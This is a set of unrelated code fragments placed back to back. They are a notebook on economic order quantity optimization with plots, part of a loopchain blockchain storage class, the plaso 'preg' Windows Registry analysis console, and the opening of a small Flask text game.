# f^{opt} & = \sqrt{2 c d h}
# \end{align*}
# $$
#
# The following chart illustrates the nature of the problem and its analytical solution.
# In[2]:
import matplotlib.pyplot as plt
import numpy as np
h = 0.75 # cost of holding one item for one year
c = 500.0 # cost of processing one order
d = 10000.0 # annual demand
eoq = np.sqrt(2*c*d/h)
fopt = np.sqrt(2*c*d*h)
print(f"Optimal order size = {eoq:0.1f} items with cost {fopt:0.2f}")
x = np.linspace(100, 10000, 1000)
f = h*x/2 + c*d/x
fig, ax = plt.subplots(figsize=(10, 6))
ax.plot(x, f, lw=3, label="total cost")
ax.plot(x, h*x/2, '--', lw=1, label="holding costs")
ax.plot(x, c*d/x, '--', lw=1, label="ordering costs")
ax.set_xlabel("x = order size")
ax.set_ylabel("cost")
ax.plot(eoq, fopt, 'ro', ms=10, label="EOQ")
ax.legend(loc='lower right')
ax.annotate(f"EOQ = {eoq:0.2f}", xy=(eoq, 0), xytext=(1.2*eoq, 0.2*fopt),
arrowprops=dict(facecolor="black", shrink=0.15, width=1, headwidth=6))
ax.plot([eoq, eoq, 0], [0, fopt, fopt], 'r--')
ax.set_xlim(0, 10000)
ax.set_ylim(0, 6000)
# ### Reformulating EOQ as a linear objective with hyperbolic constraint
#
# The optimization objective is linearized with the use of a second decision variable $y = 1/x$. The optimization problem is now a linear objective in two decision variables with a hyperbolic constraint $xy \geq 1$.
#
# $$
# \begin{align*}
# \min_{x, y}\ & f(x, y) = \frac{h x}{2} + c d y \\
# \text{s.t.}\quad x\,y & \geq 1 \\
# x, y & > 0 \\
# \end{align*}
# $$
#
# As the following diagrams the solution to this optimization problem.
#
# In[3]:
import matplotlib.pyplot as plt
import numpy as np
h = 0.75 # cost of holding one item for one year
c = 500.0 # cost of processing one order
d = 10000.0 # annual demand
x = np.linspace(100, 8000)
y = (fopt - h*x/2)/(c*d)
eoq = np.sqrt(2*c*d/h)
fopt = np.sqrt(2*c*d*h)
yopt = (fopt - h*eoq/2)/(c*d)
fig, ax = plt.subplots(figsize=(10, 6))
ax.plot(x, 1/x, lw=3, label="x y = 1")
ax.plot(x, (fopt - h*x/2)/(c*d), 'g', lw=3)
for f in fopt*np.linspace(0, 3, 11):
ax.plot(x, (f - h*x/2)/(c*d), 'g--', alpha=0.5)
ax.plot(eoq, yopt, 'ro', ms=10)
ax.annotate(f"EOQ = {eoq:0.2f}", xy=(eoq, 0), xytext=(1.2*eoq, 0.2*yopt),
arrowprops=dict(facecolor="black", shrink=0.15, width=1, headwidth=6))
ax.annotate("", xytext=(4800, 0.0006), xy=(4000, 1/3000),
arrowprops=dict(facecolor="black", shrink=0.05, width=1, headwidth=6))
ax.text(4800, .0005, "decreasing objective")
ax.fill_between(x, 1/x, 0.0008, alpha=0.2, label="x y > 1")
ax.plot([eoq, eoq], [0, yopt], 'r--')
ax.set_xlim(0, 8000)
ax.set_ylim(0, .0008)
ax.set_xlabel('x = order size')
ax.set_ylabel('y')
ax.set_title("EOQ reformulation as linear objective with a hyperbolic constraint")
ax.legend()
# ## Reformulating EOQ as a linear objective with second order cone constraint
#
# Given that a hyperbola results from the intersection of plane with cone, the hyperbola described by the constraint $x y \leq 1$ invites the question of another reformulation of EOQ with a cone constraint.
#
# The following diagram draws the intersection of a plane with Lorenz cone. The Lorenz cone is define by
#
# $$
# \begin{align*}
# C & = \{ (z, t)\in\mathbb{R}^3 \ | \ \| z \|_2 \leq t \}
# \end{align*}
# $$
#
# where the components of are given by
#
# $$z = \begin{bmatrix} u \\ v \end{bmatrix}$$
#
# The intersection of a plane aligned with the $t$ axis exactly describes a hyperbola. As described by Lobo, et al. (1998), the correspondence is given by
#
# $$w^2 \leq x y,\ x, y\geq 0,\ \iff \|\begin{bmatrix} 2w \\ x-y \end{bmatrix} \|_2 \leq x + y $$
#
# where the axis in the $w, x, y$ coordinates is tilted, displaced, and stretched compared to the coordinates shown in the diagram. The exact correspondence to the diagram is given by
#
# $$\begin{align*}
# u & \sim 2 w \\
# v & \sim x - y \\
# t & \sim x + y
# \end{align*}$$
# In[4]:
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits import mplot3d
import mpl_toolkits.mplot3d.art3d as art3d
from matplotlib.patches import Rectangle
t_max = 4
w = 2
n = 40
fig = plt.figure(figsize=(10, 10))
ax = plt.axes(projection='3d')
for t in np.linspace(0, t_max, n+1):
if t < w:
a = np.linspace(0, 2*np.pi, 30)
u = t*np.cos(a)
v = t*np.sin(a)
ax.plot3D(u, v, t, 'b', lw=0.3)
else:
b = np.arccos(w/t)
a = np.linspace(b, 2*np.pi-b, 30)
u = t*np.cos(a)
v = t*np.sin(a)
ax.plot3D(u, v, t, 'b', lw=0.3)
ax.plot3D([2, 2], [t*np.sin(b), -t*np.sin(b)], [t, t], 'b', lw=0.3)
t = np.linspace(w, t_max)
v = t*np.sin(np.arccos(w/t))
u = w*np.array([1]*len(t))
ax.plot3D(u, v, t, 'b')
ax.plot3D(u, -v, t, 'b')
ax.plot3D([0, t_max + 0.5], [0, 0], [0, 0], 'k', lw=3, alpha=0.4)
ax.plot3D([0, 0], [0, t_max + 1], [0, 0], 'k', lw=3, alpha=0.4)
ax.plot3D([0, 0], [0, 0], [0, t_max + 1], 'k', lw=3, | |
tuple([prep["id"] for prep in preps])
@lru_cache(maxsize=4)
def find_preps_addresses_by_roothash(self, roothash: Hash32) -> Tuple[ExternalAddress, ...]:
preps_ids = self.find_preps_ids_by_roothash(roothash)
return tuple([ExternalAddress.fromhex(prep_id) for prep_id in preps_ids])
@lru_cache(maxsize=4)
def find_preps_targets_by_roothash(self, roothash: Hash32) -> Mapping[str, str]:
preps = self.find_preps_by_roothash(roothash)
return MappingProxyType({prep["id"]: prep["p2pEndpoint"] for prep in preps})
def __cache_clear_roothash(self):
self.find_preps_ids_by_roothash.cache_clear()
self.find_preps_addresses_by_roothash.cache_clear()
self.find_preps_targets_by_roothash.cache_clear()
@staticmethod
def get_reps_hash_by_header(header: BlockHeader) -> Hash32:
try:
roothash = header.reps_hash
if not roothash:
raise AttributeError
except AttributeError:
roothash = ChannelProperty().crep_root_hash
return roothash
@staticmethod
def get_next_reps_hash_by_header(header: BlockHeader) -> Hash32:
try:
roothash = header.revealed_next_reps_hash
if not roothash:
raise AttributeError
except AttributeError:
# TODO: Re-locate roothash under BlockHeader or somewhere, without use ObjectManager
roothash = ChannelProperty().crep_root_hash
return roothash
def find_preps_ids_by_header(self, header: BlockHeader) -> Sequence[str]:
return self.find_preps_ids_by_roothash(self.get_reps_hash_by_header(header))
def find_preps_addresses_by_header(self, header: BlockHeader) -> Sequence[ExternalAddress]:
return self.find_preps_addresses_by_roothash(self.get_reps_hash_by_header(header))
def find_preps_by_roothash(self, roothash: Hash32) -> list:
try:
preps_dumped = bytes(self._blockchain_store.get(BlockChain.PREPS_KEY + roothash))
except (KeyError, TypeError):
return []
else:
return json.loads(preps_dumped)
@valued_only_lru_cache(maxsize=4, valued_returns_only=True)
def is_roothash_exist_in_db(self, roothash: Hash32) -> Optional[bool]:
try:
self._blockchain_store.get(BlockChain.PREPS_KEY + roothash)
except (KeyError, TypeError):
return None
else:
return True
def write_preps(self, roothash: Hash32, preps: list, batch: KeyValueStoreWriteBatch = None):
write_target = batch or self._blockchain_store
write_target.put(
BlockChain.PREPS_KEY + roothash,
json.dumps(preps).encode(encoding=conf.PEER_DATA_ENCODING)
)
# TODO The current Citizen node sync by announce_confirmed_block message.
# However, this message does not include voting.
# You need to change it and remove the default None parameter here.
def add_block(self,
block: Block,
confirm_info=None,
need_to_write_tx_info=True,
need_to_score_invoke=True) -> bool:
"""
:param block:
:param confirm_info: additional info for this block, but It came from next block of this block.
:param need_to_write_tx_info:
:param need_to_score_invoke:
:return:
"""
with self.__add_block_lock:
if need_to_write_tx_info and need_to_score_invoke and \
not self.prevent_next_block_mismatch(block.header.height):
return True
return self.__add_block(block, confirm_info, need_to_write_tx_info, need_to_score_invoke)
def __add_block(self, block: Block, confirm_info, need_to_write_tx_info=True, need_to_score_invoke=True):
with self.__add_block_lock:
channel_service = ObjectManager().channel_service
receipts, next_prep = self.__invoke_results.get(block.header.hash, (None, None))
if receipts is None and need_to_score_invoke:
self.get_invoke_func(block.header.height)(block, self.__last_block)
receipts, next_prep = self.__invoke_results.get(block.header.hash, (None, None))
if not need_to_write_tx_info:
receipts = None
if next_prep and self.find_preps_addresses_by_roothash(
Hash32.fromhex(next_prep['rootHash'], ignore_prefix=True)):
next_prep = None
next_total_tx = self.__write_block_data(block, confirm_info, receipts, next_prep)
try:
if need_to_score_invoke:
channel_service.score_write_precommit_state(block)
except Exception as e:
utils.exit_and_msg(f"score_write_precommit_state FAIL {e}")
self.__invoke_results.pop(block.header.hash, None)
self._increase_made_block_count(block) # must do this before self.__last_block = block
self.__last_block = block
self.__total_tx = next_total_tx
self.__block_manager.new_epoch()
logging.info(
f"BLOCK HEIGHT : {block.header.height}, "
f"VERSION : {block.header.version}, "
f"HASH : {block.header.hash.hex()}, "
f"CHANNEL : {self.__channel_name}")
utils.logger.debug(f"ADDED BLOCK HEADER : {block.header}")
if conf.RECOVERY_MODE:
from loopchain.tools.recovery import Recovery
utils.logger.debug(f"release recovery_mode block height : {Recovery.release_block_height()}")
if (channel_service.state_machine.state in ('Vote', 'BlockSync')
and block.header.height >= Recovery.release_block_height()):
conf.RECOVERY_MODE = False
logging.info(f"recovery mode released at {block.header.height}")
if not (conf.SAFE_BLOCK_BROADCAST and channel_service.state_machine.state == 'BlockGenerate'):
channel_service.inner_service.notify_new_block()
channel_service.reset_leader(new_leader_id=self.__block_manager.epoch.leader_id)
if block.header.prep_changed and channel_service.state_machine.state != 'BlockSync':
# reset_network_by_block_height is called in critical section by self.__add_block_lock.
# Other Blocks must not be added until reset_network_by_block_height function finishes.
channel_service.switch_role()
return True
def _write_tx(self, block, receipts, batch=None):
"""save additional information of transactions to efficient searching and support user APIs.
:param block:
:param receipts: invoke result of transaction
:param batch:
:return:
"""
write_target = batch or self._blockchain_store
# loop all tx in block
logging.debug("try add all tx in block to block db, block hash: " + block.header.hash.hex())
tx_queue = self.__block_manager.get_tx_queue()
for index, tx in enumerate(block.body.transactions.values()):
tx_hash = tx.hash.hex()
receipt = receipts[tx_hash]
tx_serializer = TransactionSerializer.new(tx.version, tx.type(), self.__tx_versioner)
tx_info = {
'block_hash': block.header.hash.hex(),
'block_height': block.header.height,
'tx_index': hex(index),
'transaction': tx_serializer.to_db_data(tx),
'result': receipt
}
write_target.put(
tx_hash.encode(encoding=conf.HASH_KEY_ENCODING),
json.dumps(tx_info).encode(encoding=conf.PEER_DATA_ENCODING))
tx_queue.pop(tx_hash, None)
if block.header.height > 0:
self._write_tx_by_address(tx, batch)
# save_invoke_result_block_height
bit_length = block.header.height.bit_length()
byte_length = (bit_length + 7) // 8
block_height_bytes = block.header.height.to_bytes(byte_length, byteorder='big')
write_target.put(
BlockChain.INVOKE_RESULT_BLOCK_HEIGHT_KEY,
block_height_bytes
)
def __write_block_data(self, block: Block, confirm_info, receipts, next_prep):
# a condition for the exception case of genesis block.
next_total_tx = self.__total_tx
if block.header.height > 0:
next_total_tx += len(block.body.transactions)
bit_length = next_total_tx.bit_length()
byte_length = (bit_length + 7) // 8
next_total_tx_bytes = next_total_tx.to_bytes(byte_length, byteorder='big')
block_serializer = BlockSerializer.new(block.header.version, self.__tx_versioner)
block_serialized = json.dumps(block_serializer.serialize(block))
block_hash_encoded = block.header.hash.hex().encode(encoding='UTF-8')
batch = self._blockchain_store.WriteBatch()
batch.put(block_hash_encoded, block_serialized.encode("utf-8"))
batch.put(BlockChain.LAST_BLOCK_KEY, block_hash_encoded)
batch.put(BlockChain.TRANSACTION_COUNT_KEY, next_total_tx_bytes)
batch.put(
BlockChain.BLOCK_HEIGHT_KEY +
block.header.height.to_bytes(conf.BLOCK_HEIGHT_BYTES_LEN, byteorder='big'),
block_hash_encoded)
if receipts:
self._write_tx(block, receipts, batch)
if next_prep:
utils.logger.spam(
f"store next_prep\nprep_hash({next_prep['rootHash']})"
f"\npreps({next_prep['preps']})")
self.write_preps(Hash32.fromhex(next_prep['rootHash'], ignore_prefix=True), next_prep['preps'], batch)
if confirm_info:
if isinstance(confirm_info, list):
votes_class = Votes.get_block_votes_class(block.header.version)
confirm_info = json.dumps(votes_class.serialize_votes(confirm_info))
if isinstance(confirm_info, str):
confirm_info = confirm_info.encode('utf-8')
batch.put(
BlockChain.CONFIRM_INFO_KEY + block_hash_encoded,
confirm_info
)
else:
utils.logger.debug(f"This block({block.header.hash}) is trying to add without confirm_info.")
if self.__last_block and self.__last_block.header.prev_hash:
# Delete confirm info to avoid data duplication.
block_hash_encoded = self.__last_block.header.prev_hash.hex().encode("utf-8")
block_confirm_info_key = BlockChain.CONFIRM_INFO_KEY + block_hash_encoded
batch.delete(block_confirm_info_key)
batch.write()
return next_total_tx
def prevent_next_block_mismatch(self, next_height: int) -> bool:
logging.debug(f"next_height: {next_height}")
score_stub = StubCollection().icon_score_stubs[self.__channel_name]
request = {
"method": "ise_getStatus",
"params": {"filter": ["lastBlock"]}
}
response = score_stub.sync_task().query(request)
score_last_block_height = int(response['lastBlock']['blockHeight'], 16)
if score_last_block_height < next_height:
for invoke_block_height in range(score_last_block_height + 1, next_height):
logging.debug(f"mismatch invoke_block_height({invoke_block_height}) "
f"score_last_block_height({score_last_block_height}) "
f"next_block_height({next_height})")
invoke_block = self.find_block_by_height(invoke_block_height)
if invoke_block is None:
raise RuntimeError("Error raised during prevent mismatch block, "
f"Cannot find block({invoke_block_height}")
if invoke_block.header.height > 0:
prev_invoke_block = self.find_block_by_height(invoke_block_height - 1)
if prev_invoke_block is None:
raise RuntimeError("Error raised during prevent mismatch block, "
f"Cannot find prev_block({invoke_block_height - 1}")
else:
prev_invoke_block = None
invoke_block, receipts = \
self.get_invoke_func(invoke_block_height)(invoke_block, prev_invoke_block)
self._write_tx(invoke_block, receipts)
try:
ObjectManager().channel_service.score_write_precommit_state(invoke_block)
except Exception as e:
utils.exit_and_msg(f"Fail to write precommit in the score.: {e}")
return True
elif score_last_block_height == next_height:
logging.debug(f"already invoked block in score...")
return False
elif score_last_block_height == next_height + 1:
try:
invoke_result_block_height_bytes = \
self._blockchain_store.get(BlockChain.INVOKE_RESULT_BLOCK_HEIGHT_KEY)
invoke_result_block_height = int.from_bytes(invoke_result_block_height_bytes, byteorder='big')
if invoke_result_block_height == next_height:
logging.debug("already saved invoke result...")
return False
except KeyError:
logging.debug("There is no invoke result height in db.")
else:
# score_last_block_height is two or more higher than loopchain_last_block_height.
utils.exit_and_msg("Too many different(over 2) of block height between the loopchain and score. "
"Peer will be down. : "
f"loopchain({next_height})/score({score_last_block_height})")
return True
def _write_tx_by_address(self, tx: 'Transaction', batch):
if tx.type() == "base":
return
address = tx.from_address.hex_hx()
return self.add_tx_to_list_by_address(address, tx.hash.hex(), batch)
@staticmethod
def __get_tx_list_key(address, index):
return conf.TX_LIST_ADDRESS_PREFIX + (address + str(index)).encode(encoding=conf.HASH_KEY_ENCODING)
def get_tx_list_by_address(self, address, index=0):
list_key = self.__get_tx_list_key(address, index)
try:
tx_list = pickle.loads(self._blockchain_store.get(list_key))
next_index = tx_list[-1]
except KeyError:
tx_list = [0] # 0 means there is no more list after this.
next_index = 0
return tx_list, next_index
def find_nid(self):
try:
if self.__nid is not None:
return self.__nid
nid = self._blockchain_store.get(BlockChain.NID_KEY)
self.__nid = nid.decode(conf.HASH_KEY_ENCODING)
return self.__nid
except KeyError as e:
logging.debug(f"There is no NID.")
return None
def add_tx_to_list_by_address(self, address, tx_hash, batch=None):
write_target = batch or self._blockchain_store
current_list, current_index = self.get_tx_list_by_address(address, 0)
if len(current_list) > conf.MAX_TX_LIST_SIZE_BY_ADDRESS:
new_index = current_index + 1
new_list_key = self.__get_tx_list_key(address, new_index)
self._blockchain_store.put(new_list_key, pickle.dumps(current_list))
current_list = [new_index]
current_list.insert(0, tx_hash)
list_key = self.__get_tx_list_key(address, 0)
write_target.put(list_key, pickle.dumps(current_list))
return True
def find_tx_by_key(self, tx_hash_key):
"""find tx by hash
:param tx_hash_key: tx hash
:return None: There is no tx by hash or transaction object.
"""
try:
tx_info_json = self.find_tx_info(tx_hash_key)
except KeyError as e:
return None
if tx_info_json is None:
logging.warning(f"tx not found. tx_hash ({tx_hash_key})")
return None
tx_data = tx_info_json["transaction"]
tx_version, tx_type = self.__tx_versioner.get_version(tx_data)
tx_serializer = TransactionSerializer.new(tx_version, tx_type, self.__tx_versioner)
return tx_serializer.from_(tx_data)
def find_invoke_result_by_tx_hash(self, tx_hash: Union[str, Hash32]):
"""find invoke result matching tx_hash and return result if not in blockchain return code delay
:param tx_hash: tx_hash
:return: {"code" : "code", "error_message" : "error_message if not fail this is not exist"}
"""
if isinstance(tx_hash, Hash32):
tx_hash = tx_hash.hex()
try:
tx_info = self.find_tx_info(tx_hash)
except KeyError as e:
if tx_hash in self.__block_manager.get_tx_queue():
# this case is tx pending
logging.debug(f"pending tx({tx_hash})")
return {'code': ScoreResponse.NOT_INVOKED}
else:
logging.debug(f"KeyError: {e!r}")
# This transaction is considered a failure.
return {'code': ScoreResponse.NOT_EXIST}
return tx_info['result']
def find_tx_info(self, tx_hash_key: Union[str, Hash32]):
if isinstance(tx_hash_key, Hash32):
tx_hash_key = tx_hash_key.hex()
try:
tx_hash: bytes = tx_hash_key.encode(encoding=conf.HASH_KEY_ENCODING)
tx_info = self._blockchain_store.get(tx_hash)
if tx_info == b'':
raise PrunedHashDataError(prefix="Tx", _hash=tx_hash)
tx_info_json = json.loads(tx_info, encoding=conf.PEER_DATA_ENCODING)
except UnicodeDecodeError as e:
logging.warning(f"UnicodeDecodeError: {e!r}")
return None
return tx_info_json
def __add_genesis_block(self, tx_info: dict, reps: List[ExternalAddress]):
"""
:param tx_info: Transaction data for making genesis block from an initial file
:return:
"""
logging.info("Make Genesis Block....")
tx_builder = TransactionBuilder.new("genesis", "", self.__tx_versioner)
nid = tx_info.get("nid")
if nid is not None:
nid = int(nid, 16)
tx_builder.nid = nid # Optional. It will be 0x3 except for mainnet and testnet if not defined
tx_builder.accounts = tx_info["accounts"]
tx_builder.message = tx_info["message"]
tx = tx_builder.build(False)
block_version = self.block_versioner.get_version(0)
block_builder = BlockBuilder.new(block_version, self.__tx_versioner)
block_builder.height = 0
block_builder.fixed_timestamp = utils.get_now_time_stamp()
block_builder.next_leader = ExternalAddress.fromhex(self.__peer_id)
block_builder.transactions[tx.hash] = tx
block_builder.reps | |
<gh_stars>1-10
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Interactive Windows Registry analysis tool.
preg is an interactive Windows Registry analysis tool that utilizes
plaso Windows Registry parser plugins, dfwinreg Windows Registry and
dfvfs storage media image capabilities.
"""
from __future__ import print_function
from __future__ import unicode_literals
import locale
import sys
import IPython
from dfvfs.lib import definitions as dfvfs_definitions
# pylint: disable=import-error
# pylint: disable=no-name-in-module
try:
# Support version 1.x of IPython.
from IPython.terminal.embed import InteractiveShellEmbed
except ImportError:
from IPython.frontend.terminal.embed import InteractiveShellEmbed
from IPython.config.loader import Config
from IPython.core import magic
from plaso.cli import tools as cli_tools
from plaso.cli import views as cli_views
from plaso.lib import errors
from plaso.lib import timelib
from l2tpreg import helper
from l2tpreg import hexdump
from l2tpreg import plugin_list
from l2tpreg import preg_tool
# Older versions of IPython don't have a version_info attribute.
if getattr(IPython, 'version_info', (0, 0, 0)) < (1, 2, 1):
raise ImportWarning(
'Preg requires at least IPython version 1.2.1.')
@magic.magics_class
class PregMagics(magic.Magics):
"""Preg iPython magics."""
# Needed to give the magic class access to the front end tool
# for processing and formatting.
console = None
REGISTRY_KEY_PATH_SEPARATOR = '\\'
# TODO: move into helper.
REGISTRY_FILE_BASE_PATH = '\\'
# TODO: Use the output writer from the tool.
output_writer = cli_tools.StdoutOutputWriter()
def _HiveActionList(self, unused_line):
"""Handles the hive list action.
Args:
line (str): command line provide via the console.
"""
self.console.PrintRegistryFileList()
self.output_writer.Write('\n')
self.output_writer.Write(
'To open a Registry file, use: hive open INDEX\n')
def _HiveActionOpen(self, line):
"""Handles the hive open action.
Args:
line (str): command line provide via the console.
"""
try:
registry_file_index = int(line[5:], 10)
except ValueError:
self.output_writer.Write(
'Unable to open Registry file, invalid index number.\n')
return
try:
self.console.LoadRegistryFile(registry_file_index)
except errors.UnableToLoadRegistryHelper as exception:
self.output_writer.Write(
'Unable to load hive, with error: {0:s}.\n'.format(exception))
return
registry_helper = self.console.current_helper
self.output_writer.Write('Opening hive: {0:s} [{1:s}]\n'.format(
registry_helper.path, registry_helper.collector_name))
self.console.SetPrompt(registry_file_path=registry_helper.path)
def _HiveActionScan(self, line):
"""Handles the hive scan action.
Args:
line (str): command line provide via the console.
"""
# Line contains: "scan REGISTRY_TYPES" where REGISTRY_TYPES is a comma
# separated list.
registry_file_type_string = line[5:]
if not registry_file_type_string:
registry_file_types = self.console.preg_tool.GetRegistryTypes()
else:
registry_file_types = [
string.strip() for string in registry_file_type_string.split(',')]
registry_helpers = self.console.preg_tool.GetRegistryHelpers(
self.console.preg_tool.artifacts_registry,
registry_file_types=registry_file_types)
for registry_helper in registry_helpers:
self.console.AddRegistryHelper(registry_helper)
self.console.PrintRegistryFileList()
def _PrintPluginHelp(self, plugin_object):
"""Prints the help information of a plugin.
Args:
plugin_object (WindowsRegistryPlugin): a Windows Registry plugin.
"""
table_view = cli_views.CLITableView(title=plugin_object.NAME)
# TODO: replace __doc__ by DESCRIPTION.
description = plugin_object.__doc__
table_view.AddRow(['Description', description])
self.output_writer.Write('\n')
for registry_key in plugin_object.expanded_keys:
table_view.AddRow(['Registry Key', registry_key])
table_view.Write(self.output_writer)
def _SanitizeKeyPath(self, key_path):
"""Sanitizes a Windows Registry key path.
Args:
key_path (str): Windows Registry key path.
Returns:
str: sanitized Windows Registry key path.
"""
key_path = key_path.replace('}', '}}')
key_path = key_path.replace('{', '{{')
return key_path.replace('\\', '\\\\')
@magic.line_magic('cd')
def ChangeDirectory(self, key_path):
"""Change between Registry keys, like a directory tree.
The key path can either be an absolute path or a relative one.
Absolute paths can use '.' and '..' to denote current and parent
directory/key path. If no key path is set the current key is changed
to point to the root key.
Args:
key_path (str): Windows Registry key path to change to.
"""
if not self.console and not self.console.IsLoaded():
return
registry_helper = self.console.current_helper
if not registry_helper:
return
registry_key = registry_helper.ChangeKeyByPath(key_path)
if not registry_key:
self.output_writer.Write(
'Unable to change to key: {0:s}\n'.format(key_path))
return
sanitized_path = self._SanitizeKeyPath(registry_key.path)
self.console.SetPrompt(
registry_file_path=registry_helper.path,
prepend_string=sanitized_path)
@magic.line_magic('hive')
def HiveActions(self, line):
"""Handles the hive actions.
Args:
line (str): command line provide via the console.
"""
if line.startswith('list'):
self._HiveActionList(line)
elif line.startswith('open ') or line.startswith('load '):
self._HiveActionOpen(line)
elif line.startswith('scan'):
self._HiveActionScan(line)
@magic.line_magic('ls')
def ListDirectoryContent(self, line):
"""List all subkeys and values of the current key.
Args:
line (str): command line provide via the console.
"""
if not self.console and not self.console.IsLoaded():
return
if 'true' in line.lower():
verbose = True
elif '-v' in line.lower():
verbose = True
else:
verbose = False
sub = []
current_file = self.console.current_helper
if not current_file:
return
current_key = current_file.GetCurrentRegistryKey()
for key in current_key.GetSubkeys():
# TODO: move this construction into a separate function in OutputWriter.
time_string = timelib.Timestamp.CopyToIsoFormat(
key.last_written_time.GetPlasoTimestamp())
time_string, _, _ = time_string.partition('.')
sub.append(('{0:>19s} {1:>15s} {2:s}'.format(
time_string.replace('T', ' '), '[KEY]',
key.name), True))
for value in current_key.GetValues():
if not verbose:
sub.append(('{0:>19s} {1:>14s}] {2:s}'.format(
'', '[' + value.data_type_string, value.name), False))
else:
if value.DataIsString():
value_string = value.GetDataAsObject()
elif value.DataIsInteger():
value_string = '{0:d}'.format(value.GetDataAsObject())
elif value.DataIsMultiString():
value_string = '{0:s}'.format(''.join(value.GetDataAsObject()))
elif value.DataIsBinaryData():
value_string = hexdump.Hexdump.FormatData(
value.data, maximum_data_size=16)
else:
value_string = ''
sub.append((
'{0:>19s} {1:>14s}] {2:<25s} {3:s}'.format(
'', '[' + value.data_type_string, value.name, value_string),
False))
for entry, subkey in sorted(sub):
if subkey:
self.output_writer.Write('dr-xr-xr-x {0:s}\n'.format(entry))
else:
self.output_writer.Write('-r-xr-xr-x {0:s}\n'.format(entry))
@magic.line_magic('parse')
def ParseCurrentKey(self, line):
"""Parse the current key.
Args:
line (str): command line provide via the console.
"""
if not self.console and not self.console.IsLoaded():
return
if 'true' in line.lower():
verbose = True
elif '-v' in line.lower():
verbose = True
else:
verbose = False
current_helper = self.console.current_helper
if not current_helper:
return
current_key = current_helper.GetCurrentRegistryKey()
parsed_data = self.console.preg_tool.ParseRegistryKey(
current_key, current_helper)
self.console.preg_tool.PrintParsedRegistryKey(
parsed_data, file_entry=current_helper.file_entry, show_hex=verbose)
# Print a hexadecimal representation of all binary values.
if verbose:
header_shown = False
current_key = current_helper.GetCurrentRegistryKey()
for value in current_key.GetValues():
if not value.DataIsBinaryData():
continue
if not header_shown:
table_view = cli_views.CLITableView(
title='Hexadecimal representation')
header_shown = True
else:
table_view = cli_views.CLITableView()
table_view.AddRow(['Attribute', value.name])
table_view.Write(self.output_writer)
self.console.preg_tool.PrintSeparatorLine()
self.console.preg_tool.PrintSeparatorLine()
value_string = hexdump.Hexdump.FormatData(value.data)
self.output_writer.Write(value_string)
self.output_writer.Write('\n')
self.output_writer.Write('+-'*40)
self.output_writer.Write('\n')
@magic.line_magic('plugin')
def ParseWithPlugin(self, line):
"""Parses a Windows Registry key using a specific plugin.
Args:
line (str): command line provide via the console.
"""
if not self.console and not self.console.IsLoaded():
self.output_writer.Write('No hive loaded, unable to parse.\n')
return
current_helper = self.console.current_helper
if not current_helper:
return
if not line:
self.output_writer.Write('No plugin name added.\n')
return
plugin_name = line
if '-h' in line:
items = line.split()
if len(items) != 2:
self.output_writer.Write('Wrong usage: plugin [-h] PluginName\n')
return
if items[0] == '-h':
plugin_name = items[1]
else:
plugin_name = items[0]
registry_file_type = current_helper.file_type
registry_plugin_list = self.console.preg_tool.GetWindowsRegistryPlugins()
plugin_object = registry_plugin_list.GetPluginObjectByName(
registry_file_type, plugin_name)
if not plugin_object:
self.output_writer.Write(
'No plugin named: {0:s} available for Registry type {1:s}\n'.format(
plugin_name, registry_file_type))
return
key_paths = plugin_list.PluginList.GetKeyPathsFromPlugin(plugin_object)
if not key_paths:
self.output_writer.Write(
'Plugin: {0:s} has no key information.\n'.format(line))
return
if '-h' in line:
self._PrintPluginHelp(plugin_object)
return
for key_path in key_paths:
registry_key = current_helper.GetKeyByPath(key_path)
if not registry_key:
self.output_writer.Write('Key: {0:s} not found\n'.format(key_path))
continue
# Move the current location to the key to be parsed.
self.ChangeDirectory(key_path)
# Parse the key.
current_key = current_helper.GetCurrentRegistryKey()
parsed_data = self.console.preg_tool.ParseRegistryKey(
current_key, current_helper, use_plugins=[plugin_name])
self.console.preg_tool.PrintParsedRegistryKey(
parsed_data, file_entry=current_helper.file_entry)
@magic.line_magic('pwd')
def PrintCurrentWorkingDirectory(self, unused_line):
"""Print the current path.
Args:
line (str): command line provide via the console.
"""
if not self.console and not self.console.IsLoaded():
return
current_helper = self.console.current_helper
if not current_helper:
return
self.output_writer.Write('{0:s}\n'.format(
current_helper.GetCurrentRegistryPath()))
class PregConsole(object):
"""Preg iPython console."""
_BASE_FUNCTIONS = [
('cd key', 'Navigate the Registry like a directory structure.'),
('ls [-v]', (
'List all subkeys and values of a Registry key. If called as ls '
'True then values of keys will be included in the output.')),
('parse -[v]', 'Parse the current key using all plugins.'),
('plugin [-h] plugin_name', (
'Run a particular key-based plugin on the loaded hive. The correct '
'Registry key will be loaded, opened and then parsed.')),
('get_value value_name', (
'Get a value from the currently loaded Registry key.')),
('get_value_data value_name', (
'Get a value data from a value stored in the currently loaded '
'Registry key.')),
('get_key', 'Return the currently loaded Registry key.')]
@property
def current_helper(self):
"""The currently loaded Registry helper."""
return self._currently_registry_helper
def __init__(self, tool):
"""Initialize a console.
Args:
tool (PregTool): preg tool.
"""
super(PregConsole, self).__init__()
self._currently_registry_helper = None
self._currently_loaded_helper_path = ''
self._registry_helpers = {}
preferred_encoding = locale.getpreferredencoding()
if not preferred_encoding:
preferred_encoding = 'utf-8'
# TODO: Make this configurable, or derive it from the tool.
self._output_writer = cli_tools.StdoutOutputWriter(
encoding=preferred_encoding)
self.preg_tool = tool
def _CommandGetCurrentKey(self):
"""Retreives the currently loaded Registry key.
Returns:
dfwinreg.WinRegistryKey: currently loaded Registry key or None if
not available.
"""
return self._currently_registry_helper.GetCurrentRegistryKey()
def _CommandGetValue(self, value_name):
"""Retrieves a value from the currently loaded Windows Registry key.
Args:
value_name (str): name of the value to be retrieved.
Returns:
dfwinreg.WinRegistryValue: a Windows Registry value, or None if not
available.
"""
current_key = self._currently_registry_helper.GetCurrentRegistryKey()
if current_key:
return current_key.GetValueByName(value_name)
def _CommandGetValueData(self, value_name):
"""Retrieves a value data from the currently loaded Windows Registry key.
Args:
value_name (str): name of the value to be retrieved.
Returns:
object: Windows Registry value data, | |
<filename>Lab6/game.py
#!/usr/bin/python
from flask import Flask, redirect, render_template, request
from random import randint
app = Flask(__name__)
app.secret_key = '<KEY>'
health = 20
power = 0
weapons = {'missile' : 2, 'burst' : 1}#, 'ion' : 3, 'flak' : 9}
money = 20
location = 1
state = 0
stopped = 0
enemy = {'health' : 10, 'stopped' : 0, 'weapons' : {'missile' : 3, 'burst' : 2, 'ion' : -1, 'flak' : -1}, 'reward' : 20}
travel = {1 : {' UP ' : '2', ' DOWN ' : '4'},
